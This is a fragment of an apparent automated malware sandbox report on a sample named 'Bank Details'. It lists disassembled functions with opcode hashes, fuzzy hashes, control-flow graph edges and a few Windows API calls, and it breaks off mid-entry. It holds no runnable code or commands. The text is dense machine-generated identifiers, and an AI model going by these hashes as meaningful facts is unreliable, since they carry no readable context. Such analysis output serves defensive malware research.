                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6b65a59671408f2f7814f0664653b39b2651e31f9376c0bdf14c72aadc31c81
                                                            • Instruction ID: 6885ce97776acb66cb62b75894b051d4678ecf480b925caadfec863379f33b7d
                                                            • Opcode Fuzzy Hash: b6b65a59671408f2f7814f0664653b39b2651e31f9376c0bdf14c72aadc31c81
                                                            • Instruction Fuzzy Hash: 53827D70A002199FDB19DF69C884AAEBBB6FF89314F158569E905EB361DB30DC41CB60
                                                            Function 07D4B198 Relevance: .9, Instructions: 934COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5113 7d4b198-7d4b787 5193 7d4b78d-7d4b7a5 5113->5193 5194 7d4bfaa-7d4bfbe 5113->5194 5316 7d4b7a7 call 17d541f 5193->5316 5317 7d4b7a7 call 17d5478 5193->5317 5318 7d4b7a7 call 17d5443 5193->5318 5201 7d4bfbf 5194->5201 5195 7d4b7ac-7d4b8ad 5195->5194 5212 7d4b8b3-7d4b8b8 5195->5212 5201->5201 5213 7d4b8be-7d4b98b 5212->5213 5214 7d4b9ca-7d4bbb0 5212->5214 5213->5194 5233 7d4b991-7d4b9b2 5213->5233 5321 7d4bbb2 call 7d4d141 5214->5321 5322 7d4bbb2 call 7d4d0e8 5214->5322 5323 7d4bbb2 call 7d4d0d9 5214->5323 5233->5214 5241 7d4b9b4-7d4b9ba 5233->5241 5242 7d4b9bc 5241->5242 5243 7d4b9be-7d4b9c0 5241->5243 5242->5214 5243->5214 5258 7d4bbb8-7d4bf5a 5319 7d4bf5c call 7d4e1d0 5258->5319 5320 7d4bf5c call 7d4e1e0 5258->5320 5311 7d4bf62-7d4bf8a 5311->5194 5316->5195 5317->5195 5318->5195 5319->5311 5320->5311 5321->5258 5322->5258 5323->5258
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f32c20c886527f88b17c02190ba0329316e2cf51d9dd8848c01d038f542e91a1
                                                            • Instruction ID: 756804595ddea70dd2d82b9af0e8746fd9d6b6c474506740d09605dcd99f89ac
                                                            • Opcode Fuzzy Hash: f32c20c886527f88b17c02190ba0329316e2cf51d9dd8848c01d038f542e91a1
                                                            • Instruction Fuzzy Hash: 7472B274A102148BCB18AFBDD98977EBBB6FF88700F4085A9D449A3750DF389D44EB61
                                                            Function 07D4B18F Relevance: .9, Instructions: 927COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5324 7d4b18f-7d4b787 5404 7d4b78d-7d4b7a5 5324->5404 5405 7d4bfaa-7d4bfbe 5324->5405 5532 7d4b7a7 call 17d541f 5404->5532 5533 7d4b7a7 call 17d5478 5404->5533 5534 7d4b7a7 call 17d5443 5404->5534 5412 7d4bfbf 5405->5412 5406 7d4b7ac-7d4b8ad 5406->5405 5423 7d4b8b3-7d4b8b8 5406->5423 5412->5412 5424 7d4b8be-7d4b98b 5423->5424 5425 7d4b9ca-7d4bbb0 5423->5425 5424->5405 5444 7d4b991-7d4b9b2 5424->5444 5529 7d4bbb2 call 7d4d141 5425->5529 5530 7d4bbb2 call 7d4d0e8 5425->5530 5531 7d4bbb2 call 7d4d0d9 5425->5531 5444->5425 5452 7d4b9b4-7d4b9ba 5444->5452 5453 7d4b9bc 5452->5453 5454 7d4b9be-7d4b9c0 5452->5454 5453->5425 5454->5425 5469 7d4bbb8-7d4bf5a 5527 7d4bf5c call 7d4e1d0 5469->5527 5528 7d4bf5c call 7d4e1e0 5469->5528 5522 7d4bf62-7d4bf8a 5522->5405 5527->5522 5528->5522 5529->5469 5530->5469 5531->5469 5532->5406 5533->5406 5534->5406
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d54d5b59a5a15e812a7b1e36a8871413586ded588e1f6f37c40d9b1e523bfedf
                                                            • Instruction ID: d52b70dca2ef5b0cd43ee7792b76d2d557a477fed96b70a2763ba640c3122b5c
                                                            • Opcode Fuzzy Hash: d54d5b59a5a15e812a7b1e36a8871413586ded588e1f6f37c40d9b1e523bfedf
                                                            • Instruction Fuzzy Hash: 1672B374A102148BCB18AFBDD98977EBBB6FF88700F4085A9D448A3750DF389D44EB65
                                                            Function 017D7AA8 Relevance: .9, Instructions: 888COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c012f1722a34b09875d94da245ff82b7692ce54715985c56a946ad38ca22e41f
                                                            • Instruction ID: 55ea92630ea4cb1dd7066e0b08a9d9b2254ff51ebf50ca32448bb762bf1f30ca
                                                            • Opcode Fuzzy Hash: c012f1722a34b09875d94da245ff82b7692ce54715985c56a946ad38ca22e41f
                                                            • Instruction Fuzzy Hash: D2823B30A00609DFCB15DF68C984AAEFBF2FF88314F258559E506AB2A5D731ED41CB61
                                                            Function 086A2388 Relevance: .6, Instructions: 596COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6e4a2803abecc4e76bf582a288858ff5019c8ed335314e8635f4c8875193e05
                                                            • Instruction ID: d452b4234778e4fbfc211cdb319c3dcaa25fbb2254a3e6c5c30a62581e43dd76
                                                            • Opcode Fuzzy Hash: c6e4a2803abecc4e76bf582a288858ff5019c8ed335314e8635f4c8875193e05
                                                            • Instruction Fuzzy Hash: FB526C34A003598FCB14DF28C844B99B7F2BF89314F2586A9D5586F3A1DB71AD86CF81
                                                            Function 086A2378 Relevance: .6, Instructions: 584COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92aa06706004cadcc9fc6c616342a04f6656ddfd5882d3fed403e2ce8209e291
                                                            • Instruction ID: b259e7f0e72a1278a8c2123dc9ebf5b166dc1830693bcffbda85f2eaa8ac7a48
                                                            • Opcode Fuzzy Hash: 92aa06706004cadcc9fc6c616342a04f6656ddfd5882d3fed403e2ce8209e291
                                                            • Instruction Fuzzy Hash: 93525C34A003598FDB14DF24C844B98B7B2BF89314F2586A9D5586F3A1DB71AD86CF81
                                                            Function 017D9FC8 Relevance: .5, Instructions: 483COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87dcec8d1da0a2135111066f09b0f1bb2d13f8db23fbb1c94d9b005a597f9cdf
                                                            • Instruction ID: 8ab9b70a15225684222fac8ac8871d877cbe19cd8141d84163d5d9e10edab6c5
                                                            • Opcode Fuzzy Hash: 87dcec8d1da0a2135111066f09b0f1bb2d13f8db23fbb1c94d9b005a597f9cdf
                                                            • Instruction Fuzzy Hash: 51221874A00218CFDB14DFA9D984B9EBBB2FF89310F1480A9D409AB365DB31AD81CF51
                                                            Function 017D4A21 Relevance: .3, Instructions: 329COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8caa77e38457743434cb259ba008313f2505fa0a3d5c30024eb39e3f0a96838c
                                                            • Instruction ID: 5c27ff066193e43de6f88ce49dbdac965e438519254e8fb9597aa17c26ddac42
                                                            • Opcode Fuzzy Hash: 8caa77e38457743434cb259ba008313f2505fa0a3d5c30024eb39e3f0a96838c
                                                            • Instruction Fuzzy Hash: 48E1B274E01258CFEB14CFA9C984BADFBF2BF89300F1480A9D50AAB265DB745985CF51
                                                            Function 07CD0194 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4762 7cd0194-7cd93b2 4765 7cd93ba-7cd93e5 DeleteFileW 4762->4765 4766 7cd93b4-7cd93b7 4762->4766 4767 7cd93ee-7cd9416 4765->4767 4768 7cd93e7-7cd93ed 4765->4768 4766->4765 4768->4767
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 07CD93D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1718362178.0000000007CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7cd0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: def807749ae2f1d7425d33eedef3829710ab93f8e16ba2cd40d792aee60526e0
                                                            • Instruction ID: 5804240e497c19ff8f93604769cffacefbddfcfd714a7ff0c855a6ed1a7a66c2
                                                            • Opcode Fuzzy Hash: def807749ae2f1d7425d33eedef3829710ab93f8e16ba2cd40d792aee60526e0
                                                            • Instruction Fuzzy Hash: B1213BB5C0465A9BCB10CF9AC5447EEFBF4FB48320F158169D914B7680D374A950CFA5
                                                            Function 0817A4AF Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4771 817a4af-817a51a PostMessageW 4773 817a523-817a537 4771->4773 4774 817a51c-817a522 4771->4774 4774->4773
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0817A50D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719979221.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8170000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 143bb9d303c33fd26c8d761b2177a401fc0fc0f01ef123ac0460bcf526eea68f
                                                            • Instruction ID: d3410986696fdf7ea1ef79b8db3e9ce536f81f120bf7de364a2a692b84fc7238
                                                            • Opcode Fuzzy Hash: 143bb9d303c33fd26c8d761b2177a401fc0fc0f01ef123ac0460bcf526eea68f
                                                            • Instruction Fuzzy Hash: 671103B58003489FDB20CF9AD985BDEBBF8EB48320F10841AE519A7640C375A544CFA1
                                                            Function 0817A4B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4776 817a4b0-817a51a PostMessageW 4777 817a523-817a537 4776->4777 4778 817a51c-817a522 4776->4778 4778->4777
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0817A50D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719979221.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8170000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 308c8c4081fed603e455da6ae3fe933cd67747e2e6759d848b3425da4becba96
                                                            • Instruction ID: bbd7d8f7a20e49bb456cbab7fe3e615930605dfaf74d9d4fd66f184f2cd6ff82
                                                            • Opcode Fuzzy Hash: 308c8c4081fed603e455da6ae3fe933cd67747e2e6759d848b3425da4becba96
                                                            • Instruction Fuzzy Hash: 281103B58003489FDB20CF9AC985BDEBBF8EB48320F10841AE519A7240C375A544CFA1
                                                            Function 017D5060 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4801 17d5060-17d5073 4804 17d50e5-17d5147 4801->4804
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e
                                                            • API String ID: 0-4024072794
                                                            • Opcode ID: 847bac6d4a5dcbc50d847f09aa2486b4f5f86d3af23fb52922d6f0a6a74143e7
                                                            • Instruction ID: b84ea9fc2c28609159e59b9b29932f40e7e83fd711d8a16a949f83d0dbd83100
                                                            • Opcode Fuzzy Hash: 847bac6d4a5dcbc50d847f09aa2486b4f5f86d3af23fb52922d6f0a6a74143e7
                                                            • Instruction Fuzzy Hash: 9C315871D09248DFDB01DFA8D498AEDBFB1FF4A700B1841EAE446AB262D7359802CF50
                                                            Function 017D0C50 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4806 17d0c50-17d0c6a 4807 17d0c6c 4806->4807 4808 17d0c71-17d0c98 4806->4808 4807->4808 4809 17d0ce1-17d0cfb 4808->4809 4810 17d0cfd-17d0d0a 4809->4810 4811 17d0c9a-17d0ca5 4809->4811 4821 17d0d0c call 17d9fc8 4810->4821 4822 17d0d0c call 17d9fb8 4810->4822 4823 17d0d0c call 17da190 4810->4823 4812 17d0cac-17d0cc0 4811->4812 4813 17d0ca7 4811->4813 4814 17d0cdf-17d0ce0 4812->4814 4815 17d0cc2-17d0ccf call 17d4a21 4812->4815 4813->4812 4814->4809 4817 17d0cd5-17d0cde 4815->4817 4817->4814 4818 17d0d12-17d0d3d 4821->4818 4822->4818 4823->4818
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: 763494d53ba278d618ed34df5c2a870b94099388ae5d768025e7ab667d17ac16
                                                            • Instruction ID: 46ddf22a8353bc76a770b1ab7953d1bbe7ea59794edef0ec42cb012e3473c467
                                                            • Opcode Fuzzy Hash: 763494d53ba278d618ed34df5c2a870b94099388ae5d768025e7ab667d17ac16
                                                            • Instruction Fuzzy Hash: BD214D74D002088BEB04DFAAD5087EEFBF6BB89310F14A42AE405B7294D7784A45CF64
                                                            Function 086A0040 Relevance: .8, Instructions: 762COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 020ba52fbd86d2f6b3a93b217269219dc409b3811b5aa606bb2d6b35ee6d87b3
                                                            • Instruction ID: 6b5484bc0cdd84a07879af89c988afc19d7900648c443b00341217aa61cd74d2
                                                            • Opcode Fuzzy Hash: 020ba52fbd86d2f6b3a93b217269219dc409b3811b5aa606bb2d6b35ee6d87b3
                                                            • Instruction Fuzzy Hash: A862FD70D01F41CBD7745FB485883AEBAA2AB45305F614A2ED0BECA790DB35A842DF47
                                                            Function 07D4B5AB Relevance: .7, Instructions: 660COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cd5c0b7aec062d0e910d5416aa7486ac0756930547cb36b7a573a7dea0afa2b
                                                            • Instruction ID: ec9f41b4640e8db000e7bd64fa86e1e418d4dbbb803528d7540d4cc1a02b487c
                                                            • Opcode Fuzzy Hash: 5cd5c0b7aec062d0e910d5416aa7486ac0756930547cb36b7a573a7dea0afa2b
                                                            • Instruction Fuzzy Hash: 6932A174A102158BCB18BF7CD98977EBBB6EF88700F4085A9D488A3750DF389D44EB65
                                                            Function 086A0006 Relevance: .5, Instructions: 466COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b46b51b393e2f172d9944ffcd6191ca9b634239bcec848c544fbac920a85f11c
                                                            • Instruction ID: ae1d78df3b31ea96ac58e484a22e5fce94a883dc2dc215e5984f5409ef2106c3
                                                            • Opcode Fuzzy Hash: b46b51b393e2f172d9944ffcd6191ca9b634239bcec848c544fbac920a85f11c
                                                            • Instruction Fuzzy Hash: 36226BB0905F428BD7704FA4868829EF691AB0A305F714A5FC0FA8A751D7369487EF4B
                                                            Function 07D4A510 Relevance: .5, Instructions: 455COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dc40bc3d24e7b5cb828834625a779f9a06b08461728be39983222e14ad4ea8f
                                                            • Instruction ID: 6f87a4b956801cbbb2f137c5564345dd881e6fc784fba3354b806f6f8606ae1d
                                                            • Opcode Fuzzy Hash: 5dc40bc3d24e7b5cb828834625a779f9a06b08461728be39983222e14ad4ea8f
                                                            • Instruction Fuzzy Hash: 6DE18C74B102048BC708BFBDE4996AE7FA6EF88750F849468E485E3390DF389C44DB65
                                                            Function 07D4D150 Relevance: .4, Instructions: 446COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8ce1c30b699c01da4884d3c43d07922c82910f6774dbcf4865f3b0747acf2c63
                                                            • Instruction ID: 4db81591cc07a8f0fc81d64a547363d3ad53b6163f44fa5e1b4ca6580dbf8e50
                                                            • Opcode Fuzzy Hash: 8ce1c30b699c01da4884d3c43d07922c82910f6774dbcf4865f3b0747acf2c63
                                                            • Instruction Fuzzy Hash: 1FF190707002199FDB18AF65D958BBEB7B7BF89600F148019EA06AB394CF39DC41CB65
                                                            Function 017D6238 Relevance: .4, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce36001ac1c557672d92a84b9e47865c2b93a4840c5e3b46b4d1c5b2ad14925b
                                                            • Instruction ID: 4431eb12727e9d7817ae93c3cfa3eaba63fe84efc1fffa17c9d8cf5c0cdf2f7b
                                                            • Opcode Fuzzy Hash: ce36001ac1c557672d92a84b9e47865c2b93a4840c5e3b46b4d1c5b2ad14925b
                                                            • Instruction Fuzzy Hash: 86E1D2307002199FDB19AF68C9547AEBBB6AF88710F148429F906CB395DF75DC81CBA1
                                                            Function 07D49193 Relevance: .4, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ca9ca3532f8c3a6f1970c2f03c9db3436fec18dcfc62ceff05e26784c0a5189
                                                            • Instruction ID: ba46ff737f450c9d0aee94c63fee32db6c8919fde94825ee08f7b546121386f6
                                                            • Opcode Fuzzy Hash: 0ca9ca3532f8c3a6f1970c2f03c9db3436fec18dcfc62ceff05e26784c0a5189
                                                            • Instruction Fuzzy Hash: 0AE16C74A002048BC704FFBDE5996AEBBB5FF88710F905968E485A3354DF38AC05DBA1
                                                            Function 07D4ED93 Relevance: .4, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeabc758c40f593e810b3eaf6184ea8c398d83ef9e85c72a9bf136c74087d19a
                                                            • Instruction ID: eeb36746ed41cb47c4c7968d93eb3be6dc63490a949ad5ab63b180c3bc478e33
                                                            • Opcode Fuzzy Hash: aeabc758c40f593e810b3eaf6184ea8c398d83ef9e85c72a9bf136c74087d19a
                                                            • Instruction Fuzzy Hash: FCE17C747142008FC304EF7DD499A2A7BE6EF88714F858968E489E7390DF38AD05DB66
                                                            Function 07D49198 Relevance: .4, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 669b63ed6b6d2e88eb7ee7a27d039b817e17cba93138683ef3a43055ef070a7d
                                                            • Instruction ID: 005553fa18671968cee05ef074b9b4b0fca0ea1bce6a864be86fcc02d6838f6a
                                                            • Opcode Fuzzy Hash: 669b63ed6b6d2e88eb7ee7a27d039b817e17cba93138683ef3a43055ef070a7d
                                                            • Instruction Fuzzy Hash: C7E16D74A002048BC704FFBDE59966EBBB5FF88710F905568E485A7354DF38AC05DBA1
                                                            Function 07D48B28 Relevance: .4, Instructions: 413COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c672e0b07fc77785d6fb264cbed28270b388064d155cbe5aebcc1b7300e2a45d
                                                            • Instruction ID: 900b23ca3ea17e8331909412d928404bd58c65c810dcd8d12e183435ce2148b5
                                                            • Opcode Fuzzy Hash: c672e0b07fc77785d6fb264cbed28270b388064d155cbe5aebcc1b7300e2a45d
                                                            • Instruction Fuzzy Hash: D3E18D75A001108BC708BFBDE49A67EBBB6EF88750F8545A8D485E3394DF38AC44D7A1
                                                            Function 086A85F3 Relevance: .4, Instructions: 410COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1720083276.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_86a0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16228af86c9b755b47909c4c3f2e7f9162517cc7f5041b4dab30edca0f1b1241
                                                            • Instruction ID: 5f45390fbe7912674849d26e7270313fb0859a26c7f725597fd25f5a58775aeb
                                                            • Opcode Fuzzy Hash: 16228af86c9b755b47909c4c3f2e7f9162517cc7f5041b4dab30edca0f1b1241
                                                            • Instruction Fuzzy Hash: B7020534A00204DFDB44DF68D498AADB7F2BF89611F5681B8E4099B366DB34EC86CF50
                                                            Function 07D4E760 Relevance: .4, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab3504fa3f9fb5a90ab494b848302873fc611548c7e1a31f66b0eaa9ee9034d0
                                                            • Instruction ID: fc972d6f325cdefd1a512643225c6adc6936df37ee6cc84049ca22582fc2b0db
                                                            • Opcode Fuzzy Hash: ab3504fa3f9fb5a90ab494b848302873fc611548c7e1a31f66b0eaa9ee9034d0
                                                            • Instruction Fuzzy Hash: E1D19E746042109FC708BF7DD58962A7BE6FF88710F498968E485D7394DF38AC09DBA2
                                                            Function 07D4AC00 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10d8c74dcbc77cfcfaeadfaf2e6af3b878fa50ebc61a56ba2f21efe08dc2883c
                                                            • Instruction ID: 9f6a3765ffd9cac87647e985459f23f885af615ba43975d2a9731ee45c8f0e6d
                                                            • Opcode Fuzzy Hash: 10d8c74dcbc77cfcfaeadfaf2e6af3b878fa50ebc61a56ba2f21efe08dc2883c
                                                            • Instruction Fuzzy Hash: 99B18EB4E101148BC708BBBDE45D67E7BB6EF88750F818569E485E3380DE389C09DBA5
                                                            Function 017DCBC0 Relevance: .3, Instructions: 330COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_17d0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 963261291dcbcea97d51cd6911b339014207cdf84913554144d29682b1e29ea6
                                                            • Instruction ID: 37727191d8a364a48cb167984a5b9253b31baa9f888a38b04e7846c79345e416
                                                            • Opcode Fuzzy Hash: 963261291dcbcea97d51cd6911b339014207cdf84913554144d29682b1e29ea6
                                                            • Instruction Fuzzy Hash: A5B17B70A101088BC704EBBDD584A7E7BBAEBC8750F958568E449E3784DE386D09D7B2
                                                            Function 07D4E75B Relevance: .3, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
